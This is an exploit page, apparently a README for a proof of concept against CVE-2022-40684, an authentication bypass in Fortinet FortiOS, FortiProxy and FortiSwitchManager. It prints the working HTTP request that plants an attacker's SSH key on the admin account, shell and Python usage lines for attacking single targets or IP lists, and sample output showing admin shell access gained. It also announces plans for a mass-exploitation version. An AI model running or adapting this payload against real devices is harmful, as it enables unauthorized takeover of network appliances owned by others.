## https://sploitus.com/exploit?id=BD07E529-B3E2-5CB8-ACD4-AD7DAD69AFBD
# CVE-2022-40684 by 1vere$k
For now it's a POC copy for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
Copied from https://github.com/horizon3ai/CVE-2022-40684
## Analysis
The exploit uses the simple payload:
```
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610

{
"ssh-public-key1": "fake-key"
}
```
## Summary
This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
## Future Plans
Develop it for a full scale exploit with multi-targets and multi-servers for mass exploit.
## CLI Usage
```
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684.sh <TARGET_IP>
or
2. ./cve-2022-40684.sh <FILE_NAME>
```
Example:
`./cve-2022-40684.sh ips.txt`
## PyUsage
`python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub`
The example:
```
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
```